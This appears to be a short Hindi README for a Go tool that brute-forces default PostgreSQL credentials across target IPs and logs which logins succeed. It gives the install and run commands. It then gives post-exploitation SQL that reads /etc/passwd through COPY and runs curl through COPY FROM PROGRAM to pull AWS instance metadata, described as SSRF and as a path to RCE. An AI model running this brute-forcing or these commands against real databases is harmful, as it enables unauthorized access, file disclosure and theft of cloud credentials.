
यह टूल डिफ़ॉल्ट क्रेडेंशियल्स की एक सूची लेता है और उसे पोस्टग्रेएसक्यूएल सर्वर पर परीक्षण करता है, तथा जो भी क्रेडेंशियल सफल होते हैं और जिन डेटाबेसों तक उनकी पहुँच होती है, उन्हें लॉग करता है।
यह Go स्क्रिप्ट creds.txt नामक फ़ाइल से उपयोगकर्ता नाम और पासवर्ड की सूची पढ़ती है और उन्हें PostgreSQL डेटाबेस पर परीक्षण करती है।
स्क्रिप्ट PostgreSQL सर्वर का IP कमांड लाइन तर्क के रूप में या IPs की टेक्स्ट फ़ाइल के रूप में स्वीकार करती है।
यदि एक्सेस दी जाती है, तो स्क्रिप्ट इस आउटपुट को pg-output.txt नामक फ़ाइल में लिखती है।
यदि postgres उपयोगकर्ता उपलब्ध है, तो यह सामान्यतः एक सुपरयूज़र होता है जो RCE या LFI या SSRf की अनुमति दे सकता है।
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
/etc/passwd/ प्राप्त करें
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - AWS मेटाडेटा प्राप्त करें
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;